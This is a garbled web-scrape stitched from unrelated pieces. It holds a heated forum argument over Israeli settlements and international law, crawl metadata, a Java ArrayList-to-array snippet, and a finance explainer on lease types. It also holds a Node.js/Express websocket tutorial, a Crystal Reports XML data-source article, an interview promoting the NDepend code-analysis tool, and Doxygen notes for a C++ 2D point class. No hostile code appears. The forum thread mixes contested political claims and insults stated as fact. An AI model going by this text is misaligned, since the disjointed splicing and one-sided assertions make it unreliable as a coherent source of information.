enough people visited the place to see what happens to those who dissent. And yet, when it comes to the Israeli Arab conflict, Syria can only want peace and prosperity for the benefit of all people. The dictator just can't overpower his irresistible urge to love the other. What a marvel! The only country in the region that traded territory three times its own size for peace. The only country in the region that was negotiating a two peoples two states solution. Yet, all wars in this region happened because of this country's unmitigated quest for land. What a miracle! Who do you think you are kidding with this silly nonsense? Only yourself "The inadmissibility of THE ACQUISITION of territory by war" :-P Yes, NB12, the UN. I know you would prefer that the US alone, and perhaps Micronesia and Tuvalu, decided about international affairs, but that's the way it is. UN Security Council Resolutions are binding and set precedent which all countries must observe (for example, UNSCR 242 stating "the inadmissibility of territory by war"), along with the 4th Geneva Convention and other international treaties which Israel regularly violates with total impunity. And I guess you would also prefer the hasbara department to issue land theft statistics, but sorry, those figures were obtained by Peace Now after an District Court in Jerusalem ordered the data to be delivered by the IDF's Civil Administration to the NGO. And this 32% does not take into account the traditional land ownership norms that used to apply in Palestine since Ottoman times, which Israel has disingenuously disregarded or misinterpreted to classify any land not strictly owned by a particular person as "state land" and free to plunder, as B'tselem exposed in its report "By Hook and Crook" last year. Even the Israeli state comptroller concluded that the Civil Administration’s land registry does not properly reflect land rights in the West Bank (Report 56A). These are not the "second Caliph's" times, NB12.The West Bank and East Jerusalem are occupied territory and are not recognized as part of Israel by any nation on Earth. Jerusalem has a seizable Palestinian population that will not leave its city of birth despite Israel's continuous attempts to the contrary. No Peace deal will ever be achieved without Jerusalem as the capital of Palestine. You'll have to share the city, if you don't want to share the whole country "from the River to the Sea". For one, Froy, you are unfamiliar with the international law. Two, what is this international law? You mean that UN circus that provides all of us with free entertainment by providing global podium to the holy trinity of the UN house clowns: Ahmalalah, Chavez and Gaddafi? You mean that parody on the league of nations where Saudi Arabia is on board of women's right commission with Libya once charing the human rights committee? Don't make me laugh, you and the clowns which you and the crowd of your likes worship. And stop quoting me those Peace Now fake statistics. Olmert offered the Palis a fair deal: Israeli withdrawal with swapping 7% of the territory by right sizing both states. The Palis agreed on swapping no more than 2%. 5% of the West Bank is not what would make or break the Palis. Never mind that they were offered to be fully compensated. Never mind that their next step, if they don't turn on Israel first, is to try their luck again in taking over Jordan. There is no 32%. And no 10%. And yes Jerusalem is the Jewish equivalent of Mecca. Mind you, non Muslims are not allowed into neither Mecca nor Medina. Jews were expelled from Arabia already under the second Caliph on the grounds that there can be no two religions in the land of the prophet. Yet, this was not enough. These people also had to expropriate other people's Meccas. Of people who never engaged in missionary activities nor in forced conversions of other people. What do I care for the international law, the abode of hypocrites like your friends and their Western cheer leaders. NB12, it is your point which is moot. Acquiring territory by means of war is strictly forbidden by International Law, regardless of the causes of such war (which was launched by Israel, anyway). That land does not belong to Israel, and it can't settle it with its civilian population. That it belongs to Jordan or to the PA is irrelevant. It still does not belong to Israel. Much less so the 32% that it confiscated from private Palestinian owners. Nobody in the whole world recognizes Israel's annexation of East Jerusalem, and not even Israel pretends that the West Bank belongs to Israel, the main reason being that then it would have to grant Israeli citizenship to the people who live in it. Israel can't have its cake and eat it too. It will have to choose between the land (and the people in it), or two separate sovereign states for each people. And the time for choosing is running out. 1948-1947 = 1948-1967 Froy Your point is moot. Only when Jordan relinquished its claim to the West Bank, then the issue of a Palestinian state has become relevant. And as a matter of fact, Jordan relinquished these claims after the collapse of secret negotiations initiated by Israel during which the two sides were negotiating the return of the West Bank to Jordan. And if Jordan would have not joined the 1967 war, it would have stayed with the West Bank. There is no reason in the world why a country that repeatedly initiates aggression against a neighboring state should consider its territorial losses as stealing of land. Jordan rejected the initial two state plan and joined other Arab armies in 1948. Throughout 1948-1947 the West Bank was used to stage cross border attacks on Israel. Finally in 1967 Jordanian forces used the West Bank as a launch pad for another invasion. Enough is enough. NB12, one third of the land over which those settlements were built was privately owned by Palestinians and illegally confiscated by Israel. That is land Israel stole from Palestinians. And in any case, once Jordan gave up claims over that territory in favor of the PLO, all that land which never belonged to Israel regardless of who was the rightful owner, became "Palestinian land" "de jure". So yes, it is very much stolen Palestinian land that Israel has to give back to its legitimate owner. ***Whitechapel. *** There is no Palestinian land Israel stole in the West Bank. Before 1967 the West bank was under the Jordanian rule and used for staging cross border raids by the PLO. Jordan was tricked to join the 1967 war by Egypt when Nasser misled the king into thinking that the Arab forces were victorious. The Jordanian forces entered the fray, but were routed and the West Bank fell under Israeli control. There was no Palestinian state there at the time, while the PLO itself positioned itself as a pan Arabist movement fighting for a single pan Arab mega state. "The PLO has long wanted a Palestinian State to co-exist peacefully alongside Israel-there is plenty of evidence on this." The PLO charter was officially rejecting the right of Israel to exist even in in the middle of the Oslo process. Yeah, Brian, time not the return of stolen. Time, with the expansion of settlements. Do you know when the biggest spike in construction in the West Bank was? During those hopeful days in the Oslo years. Remember those days?. "Where's Israel proof?" Perhaps in giving time and time again land in exchange for promises of peace ang getting rocket fire, kidnappings and suicide bombings in return.
http://www.economist.com/blogs/newsbook/2011/01/al_jazeera_and_palestinians
crawl-003
refinedweb
2,798
62.88
In a way, it is an indirect form of leasing. The owner of an equipment/asset sells it to a leasing company (lessor) which leases it back to the owner (lessee). A classic example of this type of leasing is the sale and lease back of safe deposits vaults by banks under which banks sell them in their custody to a leasing company at a market price substantially higher than the book value. The leasing company in turn offers these lockers on a long-term basis to the bank. The bank subleases the lockers to its customers. The lease back arrangement in sale and lease back type of leasing can be in the form of finance lease or operating lease. Direct Lease In direct lease, the lessee, and the owner of the equipment are two different entities. A direct lease can be of two types: Bipartite and Tripartite lease. Bipartite Lease There are two parties in the lease transaction: (i) equipment supplier-cum-lessor and (ii) lessee. Such a type of lease is typically structured as an operating lease with inbuilt facilities, like upgradation of the equipment (Upgrade lease), addition to the original equipment configuration and so on. The lessor maintains the asset and, if necessary, replaces it with a similar equipment in working conditions (Swap lease). Tripartite Lease Such type of lease involves three different parties in the lease agreement: equipment supplier, lessor and lessee. An innovative variant of tripartite lease is the sales-aid lease under which the equipment supplier arranges for lease finance in various forms by: · Providing reference about the customer to the leasing company; · Negotiating the terms of the lease with the customer and completing all the formalities on behalf of the leasing company; · Writing the lease on his own account and discounting the lease receivables with the designated leasing company. The effect is that the leasing company owns the equipment and obtains an assignment of the lease rental. The sales-aid lease is usually with recourse to the supplier in the event of default by the lessee either in the form of offer from the supplier to buy back the equipment from the lessor or a guarantee on behalf of the lessee. Single Investor Lease and Leveraged Lease Single Investor Lease There are only two parties to the lease transaction, the lessor and the lessee. The leasing company (lessor) funds the entire investment by an appropriate mix of debt and equity funds. The debts raised by the leasing company to finance the asset are without recourse to the lessee, that is, in the case of default in servicing the debt by the leasing company, the lender is not entitled to payment from the lessee. Leveraged Lease There are three parties to the transaction: (i) lessor (equity investor), (ii) lender and (iii) lessee. In such a lease, the leasing company (equity investor) buys the asset through substantial borrowing with full recourse to the lessee and without any recourse to itself. The lender (loan participant) obtains an assignment of the lease and the rentals to be paid by the lessee are a first mortgaged asset on the leased asset. The transaction is routed through a trustee who looks after the interest of the lender and lessor. On receipt of the rentals from the lessee, the trustee remits the debt-service component of the rental to the loan participant and the balance to the lessor. To illustrate, assume the Avon Leasing Ltd (ALL) has structured a leveraged lease with an investment cost of $ 50 crore. The investment is to be financed by equity from it and loan from the Avon Bank Ltd (ABL) in the ratio of 1:4. The interest on loan may be assumed to be 20 per cent per annum to be repaid in five equated annual instalments. If the required rate of return (gross yield) of the ALL is 24 per cent, calculate (a) the equated annual instalment and (b) the annual lease rental. Like other lease transactions, leverage lease entitles the lessor to claim tax shields on deprecation and other capital allowances on the entire investment cost including the non-recourse debt. The return on equity (profit after tax divided by networth) is, therefore, high. From the lessee's point of view, the effective rate of interest implicit in the lease arrangement is less than on a straight loan as the lessor passes on the portion of the tax benefits to the lessee in the form of lower rental payments. Leveraged lease packages are generally structured for leasing investment-intensive assets like aircraft, ships and so on. Attach Files
http://www.transtutors.com/homework-help/finance/behavioral-finance/framing-effect/house-money/
CC-MAIN-2017-34
refinedweb
767
55.17
How to Set Up a Websocket Server with Node.js and Express June 1st, 2021 What You Will Learn in This Tutorial How to attach a websocket server to an existing Express server to add real-time data to your app. Table of Contents Master Websockets — Learn how to build a scalable websockets implementation and interactive UI. Getting started For this tutorial, we're going to be using the CheatCode Node.js Boilerplate. This will give us access to an existing Express server that we can attach our websocket server to: Terminal git clone After you've cloned the project, cd into it and install its dependencies: Terminal cd nodejs-server-boilerplate && npm install Finally, for this tutorial, we need to install two additional dependencies: ws for creating our websocket server and query-string for parsing query params from our websocket connections: Terminal npm i ws query-string After this, start up the development server: Terminal npm run dev Creating a websocket server To begin, we need to set up a new websocket server that can handle inbound websocket requests from clients. First, in the /index.js file of the project we just cloned, let's add a call to the function that will setup our websocket server: /index.js import express from "express"; import startup from "./lib/startup"; import api from "./api/index"; import middleware from "./middleware/index"; import logger from "./lib/logger"; import websockets from './websockets'; startup() .then(() => { const app = express(); const port = process.env.PORT || 5001; middleware(app); api(app); const server = app.listen(port, () => { if (process.send) { process.send(`Server running at } }); websockets(server); process.on("message", (message) => { console.log(message); }); }) .catch((error) => { logger.error(error); }); Here, we've imported a hypothetical websockets function from ./websockets which is anticipating an index.js file at that path (Node.js interprets this as ./websockets/index.js). Inside of the .then() callback for our server startup() function, we've added a call to this function just beneath our call to app.listen(). To it, we pass server which is the HTTP server returned by Express when the HTTP server is opened on the passed port (in this case 5001). Once server is available, we call to our websockets() function, passing in the HTTP server (this is what we'll attach the websocket server to that we'll create in the next section). Attaching a websocket server to an express server Next, we need to create the /websockets/index.js file that we assumed will exist above. To keep our code clean, we're going to create a separate websockets directory at the root of the project we cloned and create an index.js file inside of that: /websockets/index.js import WebSocket from "ws"; export default (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); return websocketServer; }; Here, we export a function that takes in a single argument of expressServer which contains the Express app instance that we intend to pass in when we call the function from /index.js at the root of the project. Just inside that function, we create our websocket server using the Websocket.Server constructor from the ws package that we installed above. To that constructor, we pass the noServer option as true to say "do not set up an HTTP server alongside this websocket server." The advantage to doing this is that we can share a single HTTP server (i.e., our Express server) across multiple websocket connections. We also pass a path option to specify the path on our HTTP server where our websocket server will be accessible (ultimately, localhost:5001/websockets). /websockets/index.js import WebSocket from "ws"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); expressServer.on("upgrade", (request, socket, head) => { websocketServer.handleUpgrade(request, socket, head, (websocket) => { websocketServer.emit("connection", websocket, request); }); }); return websocketServer; }; Extending our code, next, we need to handle the attachment of the websocket server to the existing expressServer. To do it, on the expressServer we listen for an upgrade event. This event is fired whenever our Express server—a plain HTTP server—receives a request for an endpoint using the websockets protocol. "Upgrade" here is saying, "we need to upgrade this request to handle websockets." Passed to the callback for the event handler—the .on('upgrade') part—we have three arguments request, socket, and head. request represents the inbound HTTP request that was made from a websocket client, socket represents the network connection between the browser (client) and the server, and head represents the first packet/chunk of data for the inbound request. Next, inside the callback for the event handler, we make a call to websocketServer.handleUpgrade(), passing along with the request, socket, and head. What we're saying with this is "we're being asked to upgrade this HTTP request to a websocket request, so perform the upgrade and then return the upgraded connection to us." That upgraded connection, then, is passed to the callback we've added as the fourth argument to websocketServer.handleUpgrade(). With that upgraded connection, we need to handle the connection—to be clear, this is the now-connected websocket client connection. To do it, we "hand off" the upgraded connection websocket and the original request by emitting an event on the websocketServer with the name connection. Handling inbound websocket connections At this point, we've upgraded our existing Express HTTP server, however, we haven't completely handled the inbound request. In the last section, we got up to the point where we're able to upgrade the inbound HTTP request from a websocket client into a true websocket connection, however, we haven't handled that connection. /websockets/index.js import WebSocket from "ws"; import queryString from "query-string"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({[...]}); expressServer.on("upgrade", (request, socket, head) => {[...]});); }); } ); return websocketServer; }; To handle that connection, we need to listen for the connection event that we emitted in the last section. To do it, we make a call to websocketServer.on('connection') passing it a callback function that will handle the inbound websocket connection and the accompanying request. To clarify, the difference between the websocketConnection and the connectionRequest is that the former represents the open, long-running network connection between the browser and the server, while the connectionRequest represents the original request to open that connection. Focusing on the callback we've passed to our .on('connection') handler, we do something special. Per the implementation for websockets, there is no way to pass data (e.g., a user's ID or some other identifying information) in the body of a websocket request (similar to how you can pass a body with an HTTP POST request). Instead, we need to include any identifying information in the query params of the URL of our websocket server when connecting to the server via a websocket client (more on this in the next section). Unfortunately, these query params are not parsed by our websocket server and so we need to do this manually. To extract the query params into a JavaScript object, from the connectionRequest, we grab the URL the request was made for (this is the URL the websocket client makes the connection request to) and split it at the ?. We do this because we don't care about any part of the URL before and up to the ?, or, our query params in URL form. Using JavaScript array destructuring, we take the result of our .split('?') and assume that it returns an array with two values: the path portion of the URL and the query params in URL form. Here, we label the path as _path to suggest that we're not using that value (prefixing an _ underscore to a variable name is a common way to denote this across programming languages). Then, we "pluck off" the params value that was split off from the URL. To be clear, assuming the URL in the request looks like ws://localhost:5001/websockets?test=123&test2=456 we expect something like this to be in the array: ['ws://localhost:5001/websockets', 'test=123&test2=456'] As they exist, the params (in the example above test=123&test2=456) are unusable in our code. To make them usable, we pull in the queryString.parse() method from the query-string package that we installed earlier. This method takes a URL-formatted query string and converts it into a JavaScript object. The end result considering the example URL above would be: { test: '123', test2: '456' } With this, now we can reference our query params in our code via the connectionParams variable. We don't do anything with those here, but this information is included because frankly, it's frustrating to figure that part out. /websockets/index.js import WebSocket from "ws"; import queryString from "query-string"; export default async (expressServer) => { const websocketServer = new WebSocket.Server({ noServer: true, path: "/websockets", }); expressServer.on("upgrade", (request, socket, head) => { websocketServer.handleUpgrade(request, socket, head, (websocket) => { websocketServer.emit("connection", websocket, request); }); });); websocketConnection.send(JSON.stringify({ message: 'There be gold in them thar hills.' })); }); } ); return websocketServer; }; Above, we have our completed websocket server implementation. What we've added is an event handler for when our websocketConnection receives an inbound message (the idea of websockets is to keep a long-running connection open between the browser and the server across which messages can be sent back and forth). Here, when a message event comes in, in the callback passed to the event handler, we take in a single message property as a string. Here, we're assuming that our message is a stringified JavaScript object, so we use JSON.parse() to convert that string into a JavaScript object that we can interact with in our code. Finally, to showcase responding to a message from the server, we call to websocketConnection.send(), passing a stringified object back (we'll assume the client is also anticipating a stringified JavaScript object being passed in its inbound messages). Testing out the websocket server Because we're not showcasing how to set up a websocket client in a front-end in this tutorial, we're going to use a Chrome/Brave browser extension called Smart Websocket Client that gives us a pseudo front-end that we can use to test things out. On top, we have our running HTTP/websocket server running in a terminal (this is the development server of the projet we cloned at the beginning of this project) and on the bottom, we have the Smart Websocket Client extension opened up in the browser (Brave). First, we enter the URL where we expect our websocket server to exist. Notice that instead of the usual that we prefix to a URL when connecting to a server, because we want to open a websocket connection, we prefix our URL with ws:// (similarly, in production, if we have SSL enabled we'd want to use wss:// for "websockets secure"). Because we expect our server to be running on port 5001 (the default port for the project we're building this on top of and where our HTTP server is accepting requests), we use localhost:5001, followed by /websockets?userId=123 to say "on this server, navigate to the /websockets path where our websocket server is attached and include the query param userId set to the value 123." When we click the "Connect" button in the extension, we get an open connection to our websocket server. Next, to test it out, in the text area beneath the "Send" button, we enter a pre-written stringified object (created by running JSON.stringify({ howdy: "tester" }) in the browser console) and then click the "Send" button to send that stringified object up to the server. If we watch the server terminal at the top, we can see the userId query param being parsed from the URL when we connect and when we send a message, we see that message logged out on the server and get the expected { message: "There be gold in them thar hills." } message in return on the client. Wrapping up In this tutorial, we learned how to set up a websocket server and attach it to an existing Express HTTP server. We learned how to initialize the websocket server and then use the upgrade event on inbound connection requests to support the websockets protocol. Finally, we looked at how to send and receive messages to our connected clients and how to use JSON.stringify() and JSON.parse() to send objects via websockets. Get the latest free JavaScript and Node.js tutorials, course announcements, and updates from CheatCode in your inbox. No spam. Just new tutorials, course announcements, and updates from CheatCode.
https://cheatcode.co/tutorials/how-to-set-up-a-websocket-server-with-node-js-and-express
CC-MAIN-2022-21
refinedweb
2,113
54.12
Today, I will share a very basic Java program that converts an ArrayList to an array. For most Java developers this is a routine task, but many newcomers to Java have asked me this question of how to convert an array to ArrayList. Here is the example code. import java.util.*; public class ArrayToArrayList{ public static void main(String args[]){ //Create an ArrayList of Strings. ArrayList<String> list = new ArrayList<String>(); //Populate the ArrayList. list.add("A1"); list.add("A2"); list.add("A3"); list.add("A4"); list.add("A5"); list.add("A6"); /*Initialize a String array. Set array's capacity equal to ArrayList size*/ String[] array = new String[list.size()]; //Now get the array from ArrayList. There is no magic here. //We are calling toArray method of the ArrayList class. array = list.toArray(array); } } How to convert a Java Array to a List In some instances, you may need to convert an array to a list. This is also a simple task. Using the array variable defined in the example above, we can call asList method of the Arrays class to get a List variable from the array. List list2 = Arrays.asList(array); Enjoy! Nice, I just wished I had knew some java sense. 🙂 Arrays class is actually bridge between Array and ArrayList. you can also see here for couple of more ways to convert Array to ArrayList
http://zparacha.com/how-to-convert-an-arraylist-to-array-in-java
CC-MAIN-2017-51
refinedweb
228
67.65
You can subscribe to this list here. Showing 3 results of 3 Edi Weitz <edi@...> writes: > the build process hangs forever and CPU usage (kernel) approaches > 100%. Any idea what could be the cause? > > The file customize-target-features.lisp looks like this > > (lambda (list) > (adjoin :sb-thread list)) Possibly not related, but some time ago I had a problem with building a threaded SBCL which manifested itself in SBCL giving a 'bad signal number -1' message at warm init and then exiting (so it didn't hang). It was easy to track this down to a bug in (my build of) glibc-2.3.1. A test is to run #include <stdio.h> #include <signal.h> main () { printf("%d\n",SIGRTMIN); } Upgrading to glibc-2.3.2 eliminated the bug. Wolfgang Hi!.
http://sourceforge.net/p/sbcl/mailman/sbcl-help/?viewmonth=200401&viewday=5
CC-MAIN-2015-40
refinedweb
133
77.64
This article is intended to illustrate the benefits of using disconnected connection in crystal reports. In connected mode the performance of the reports is very big issue when the size of the database gets bigger especially in web application the response time is very poor. Xml schema is now a standard way of moving data between the systems. Xml schema are extensible for future use, this property is also very useful when we have changes on the db side and report side. By using the benefits of ADO.NET we can also made desired changes in memory before passing to the reports. The sample application is an example in which things has been explained in very simple manner. Complex scenario can be driven from it. This application is running on .net framework 2.0 and Crystal report 2008. Setting Data source location In crystal report 2008 select database location option from Database menu. Then click on the ADO.NET option. Then design the application in standard way, please download source file and view sample report file with this article Application logic. Run the executable application and select respective files The libraries must be included in namespace. The crystalDecisions.CrystalReports.Engine namespace provides support for the report engine. using CrystalDecisions.CrystalReports.Engine; using CrystalDecisions.Shared; In DataSet object give the names of the table defined in the XSD File. I am using only a single table but there can be multiple tables in schema so please don't forget to define the table name in dataset while populating DataSet for respective table. dsSource = new DataSet("TableA"); Populate the dataset with the xml source file. Reads XML schema and data into the System.Data.DataSet using the specified file. dsSource.ReadXml(strSourceFile); The report document object represents a report and contains properties and methods to define, format, load, export, and print the report e.g, reportDoc = new ReportDocument(); reportDoc.Load(strFileName); After finalizing above steps it time to pass it to the crystal report viewer object. The CrystalReportViewer control allows a Crystal Report to be viewed in an application. The ReportSource property is used to set which report is to be viewed. Once this property is set, the report will be shown in the viewer. The source of the report can either be a ReportDocument, a path to the report file, or a strongly typed report. reportDoc.SetDataSource(dsSource); frmShowReport.crViewer.ReportSource = reportDoc; frmShowReport.ShowDialog(); Thanks View All
http://www.c-sharpcorner.com/UploadFile/nadeemab/xsd-xml-based-crystal-report-data-source/
CC-MAIN-2017-13
refinedweb
406
50.43
Last night I uploaded my project to pythonanywhere.com where I wanted to test my production settings. In one of my models I allow users to upload JPG's (Logo of a team). The uploading process works good, the file lands in my MEDIA_ROOT. The issue is that when I try to access it in my template (to display it on the page) I get a 404. My first thought is that my MEDIA_URL is not configured properly but I still don't know why. I want to say that my media folder isn't in the project - it is outside. On development mode I see the Logo (I have the if settings.DEBUG: urlpattern += static(...) option set properly). I'm using Django 1.9.7 with python 2.7 Here is my code: My model: class Team(models.Model): name = models.CharField(verbose_name='Name of the team', max_length=24) logo = models.ImageField(upload_to='team_logos', verbose_name='Logo', blank=True, null=True) def get_logo(self): u"""Get path to logo, if there is no logo then show default.""" if self.logo: return self.logo.url return '/static/img/default_team_logo.jpg' STATIC_URL = '/static/' STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media", "soccerV1", "static") STATICFILES_DIRS = ( os.path.join(BASE_DIR, "media", "static"), ) MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media", "soccerV1", "media") <td><img src="{{ details.get_logo }}" alt="{{ details.name }} logo" height="64px" width="64px"></td> You need to set a media files mapping in PythonAnywhere's dashboard. From their documentation: /media/) /home/username/etc) Then hit Reload and your uploaded files should be served correctly.
https://codedump.io/share/5MmL54vwfgVc/1/404-on-media-files---django
CC-MAIN-2017-39
refinedweb
266
54.39
The Next Level of Code Analysis using ‘NDepend’: An Interview with Patrick Smacchia Posted by: Suprotim Agarwal , on 2/6/2009, in Category Product Articles Views: 69541 Tweet Abstract: In this post, Suprotim Agarwal (ASP.NET MVP) interviews Patrick Smacchia, a C# MVP about the NDepend product. The Next Level of Code Analysis using ‘NDepend’: An Interview with Patrick Smacchia In this post, Suprotim Agarwal (ASP.NET MVP) interviews Patrick Smacchia, a C# MVP about the NDepend product. NDepend is a .NET code analyzer tool on steroids. This tool analyzes your .NET assemblies and the compiled source code, with a variety of metrics . I had been using FxCop till date for code analysis, before I was introduced to NDepend by its creator, Patrick Smacchia, a C# MVP. Something that impressed me the most was CQL and code metrics, which can be used to examine complexity and dependencies in your code and improve the overall quality of your code. This tool will in fact change the way you glance at code! In this article, we will discuss the NDepend product with Patrick and understand how this product takes code analysis and code metrics to the next level. Suprotim: Tell us more about yourself and NDepend. How did the product evolve? Patrick: My name is Patrick Smacchia, I am French, 33 years old, and I basically write software since I learnt to write thanks to my father who is also a programmer for more than 35 years by now. The NDepend project started in April 2004. At that time I was consulting and I wrote NDepend as a quick project to demystify the massive and extremely complex code base of a client. I was interested to get basic metrics such as NbLinesOfCode but also Robert C Martin metrics about abstractness vs. stability . This first NDepend version was pretty useful and I released it OSS online straight. The tool then became pretty popular, also partly because at that time the .NET community was lacking development tools. I did the math and if a few fraction of users would buy a few hundred US$’ professional license, then I could start making a living on it and invest all my time in development. After a whole year of very hard work the version 2.0 RTM went live in February 2007 and hopefully the business model wasn’t flawed. I summarized all this in this blog post and I hope it can foster developers mates to innovate and start their own ISV. Since then, the company grew and we worked a lot on both features and usability of our flagship product NDepend. Suprotim: How does NDepend fit in the Software Development Process? What is CQL and how does it relate to the product? Patrick: NDepend is all about understanding and controlling what really happens in your development shop. The idea is to fetch relevant information from the code itself. The tool has 2 sides: The Visual side where the VisualNDepend UI lets you analyze live your code base, with graph, matrix, metrics panel. These visual panels with dependency graph, matrix and metric treemap, help a lot churning the code. Some screenshot can be found here . Fig 1: Selection by Metrics and display the set of methods selected on the Metrics View Fig 2: Using the Dependencies Structure Matrix to understand coupling between assemblies Fig 3: Selecting the list of methods where code was changed between 2 versions and visualizing source code modifications with Windiff Fig 4: The Visual Studio Add-In VisualNDepend comes also with Code Query Language CQL . CQL is really at the heart of the product. CQL is to your code what is SQL to your data. You can ask for example which method has more than 30 lines of code by writing the CQL query: METHODS WHERE NbLinesOfCode > 30 And if you want to be warned of such big methods you can transform this CQL query into a CQL rule this way: WARN IF Count > 0 IN METHODS WHERE NbLinesOfCode > 30 CQL covers a wide range of possibility, from 82 code metrics to dependencies, encapsulation, mutability, code changes/diff/evolution or test coverage. For example asking for methods that has been changed recently and has not been covered by tests is as easy as writing: METHODS WHERE CodeWasChanged AND PercentageCoverage < 100 NDepend comes with more than 200 rules per default and you can modify existing rules and add new rules at whim to fit your needs. The other side of NDepend is its integration into the Continuous Integration/Build server process. The idea is to get a daily and highly customized HTML report where you can see at a glance if some CQL rules have been violated and to get also some metrics about quality or structuring. This is how one can master what is really happening in its development shop Suprotim: Many teams have assemblies built in both C# and VB.NET. How does NDepend analyze such applications built using multiple languages? Patrick: NDepend takes as input any .NET assemblies, no matter the language it was written in. 95% of the information gathered by NDepend comes from assemblies themselves. NDepend also parses source files but only a few metrics are gathered from source: Source Code Cyclomatic Complexy and Comment metrics. So far only C# source files are parsed and we plan VB.NET source files parsing for the next months. More details about all this can be found here . Suprotim: How would you compare NDepend with other popular tools like ReSharper and FxCop? Patrick: I am a big fan of Resharper and I like to think that what is Resharper doing locally, at the level of method, NDepend does it at large scale level, on type, namespaces and assemblies. Resharper typically warns about a logical if expression flawed where NDepend typically warns about a component too big or too entangled. FxCop comes with more than 200 hundreds pre-defined rules. FxCop rules mainly inform you how to use the .NET framework and you have a few quality rules also. NDepend CQL rules are more focused on your code itself although 30 pre-defined CQL rules covers some .NET Framework usage good practices. NDepend will typically let you know that some abstractions have to be created to avoid over-coupling, while FxCop rules will typically let you know that you should use a StringBuilder to concatenate strings inside a loop instead of using the ‘+’ operator. Suprotim: How does NDepend help you in Agile projects where most of the efforts are on delivering code? Patrick: Agile development is all about rationalizing the work to avoid repetitive burden tasks. Agile fosters efficient communication between developers and continuous correctness check with automatic tests. The NDepend’s CQL language lets developers express their intentions in a formal way. For example developers can create a specific rule to avoid that UI code uses directly DB related code. But as a big bonus CQL rules are active, I mean you’ll know automatically when a rule will be violated. So not only CQL rules improve the communication between developers but it also prevents code erosion by discarding the burden of manually check that developers respect intentions and quality effort put into the code. Suprotim: Tell us about a recent experience with NDepend in a real-world environment? Can we see a case study? Patrick: There are various NDepend users profile, from the independent consultant to the massive team cluster composed of hundreds of developers and millions of lines of code. Part of the NDepend challenge is to let users cop with very large code base. To do so we constantly invest in the performance of our code. We recently have feedback from one of this massive team and I wrote a blog post about their experience here: Using NDepend on large project, a success story . I also had the opportunity to recently help a 60 developers team cranking with NDepend concepts and I wrote about this experience here . Basically the more complex is your code base, the more you need tooling such as NDepend; especially if you wish to spend efficiently your resources on large scale refactoring to transform a large legacy made of messy code into a sane development shop. NDepend can be also be useful on smaller code base. For example you can read what NDepend has to say by analyzing the 15.000 lines of code of the NUnit project here: Suprotim: Can dotnetcurry.com viewers see a Live Demo of this tool? Do we have an NDepend forum to discuss this tool? Patrick: On the of our site we link a dozens of short 3mn screencasts to demonstrate how NDepend handles various scenarios, like comparison of 2 snapshots of a code base, dependency browsing or quality metrics checking. Suprotim: The NDepend product is loaded with features and metrics. What are your plans in 2009? Patrick: In 2009 Q2, the 2 NDepend’s brothers XDepend (for Java) and CppDepend (for C++) will see the light of the day. A public beta of XDepend is already available on the XDepend website . NDepend is often qualified as a polished tool by its users and in 2009 we wish to continue investing in even more usability. With System.Reflection everyone can write a quick static analyzer of .NET code in a few days such as what was NDepend in its early days. What we learnt the hard way is that usability can only comes at the cost of years of solid development and IMHO usability is what makes the difference. Part of our 2009 usability plans is to integrate nicely Visual NDepend panels into VisualStudio but one can expect also dozens of tricky featurettes. We also have several major innovative features in the pipe but for some confidential reasons I cannot unveil them by now. For the benefit of all .NET developers (our team included), the .NET tooling scene is very active these days and we will continue investing into features that so far, no other tools have. I hope you enjoyed this interview with Patrick. Here’s some simple advice to all of you: Understand and list down the metrics that are important to your product/project. Then strive towards achieving them with a tool like NDepend that will keep you on track! If you have any questions for Patrick, you can use the Comments section below or use the . If you liked the interview, or Subscribe Via Email Follow @dotnetcurry Recommended Articles Wayne on Saturday, February 7, 2009 12:41 PM Another difference is that FxCop comes free! Comment posted by Deepali Kamatkar on Thursday, August 20, 2009 3:31 AM Gr8 article.. Came to know abt an excellent product!! .NET TOOLS POPULAR ARTICLES Validate a Form using jQuery and Bootstrap Validator Business Application using HTML5, ASP.NET MVC, Web API and Knockout.js - Part 1 Implementing ASP.NET Web API Versioning using Custom Header and testing it in an Angular.js application Using TransactionScope across Databases using ADO.NET Entity Framework and ASP.NET MVC Read a Local File using HTML5 and JavaScript Building ASP.NET MVC 6 & Entity Framework 7 application using ASP.NET 5 RC Open-Closed Principle (Software Gardening: Seeds) Angular 2: Developer Preview HTML Data Grid with CRUD Operations in ASP.NET MVC using Knockout.js, Require.js and WEB API New Build Features in TFS 2015 and Visual Studio Online Using Raphael.js Charts in ASP.NET MVC Configure ASP.NET MVC to use Multiple ADFS using OWIN KATANA Code Contracts in C# Consuming a Web API Asynchronously in ASP.NET MVC or WPF Securing ASP.NET Web API using Token Based Authentication and using it in Angular.js application
http://www.dotnetcurry.com/(X(1)S(ckvzil55252hloaarygxx3ya))/ShowArticle.aspx?ID=268
CC-MAIN-2016-07
refinedweb
1,950
63.09
a point in 2D nonhomogeneous space More... #include <vcl_iosfwd.h> #include <vgl/vgl_fwd.h> #include <vgl/vgl_vector_2d.h> #include <vcl_cassert.h> #include <vcl_vector.h> Go to the source code of this file. a point in 2D nonhomogeneous space Modifications 29 June 2001 Peter Vanroose moved arithmetic operators to new vgl_vector_2d 2 July 2001 Peter Vanroose implemented constructor from homg point 21 May 2009 Peter Vanroose istream operator>> re-implemented Definition in file vgl_point_2d.h. Definition at line 262 of file vgl_point_2d.h. Return the point at the centre of gravity of two given points. Identical to midpoint(p1,p2). Definition at line 219 of file vgl_point_2d.h. Return the point at the centre of gravity of three given points. Definition at line 229 of file vgl_point_2d.h. Return the point at the centre of gravity of four given points. Definition at line 240 of file vgl_point_2d.h. Return the point at the centre of gravity of a set of given points. Beware of possible rounding errors when Type is e.g. int. Definition at line 253 of file vgl_point_2d.h. Are three points collinear, i.e., do they lie on a common line?. Definition at line 180 of file vgl. Return true iff the point is at infinity (an ideal point). Always returns false. Definition at line 115 of file vgl_point_2d.h. Return the point at a given ratio wrt two other points. By default, the mid point (ratio=0.5) is returned. Note that the third argument is Type, not double, so the midpoint of e.g. two vgl_point_2d<int> is not a valid concept. But the reflection point of p2 wrt p1 is: in that case f=-1. Definition at line 206 of file vgl_point_2d.h. Adding a vector to a point gives a new point at the end of that vector. Note that vector + point is not defined! It's always point + vector. Definition at line 128 of file vgl_point_2d.h. Adding a vector to a point gives the point at the end of that vector. Definition at line 135 of file vgl_point_2d.h. The 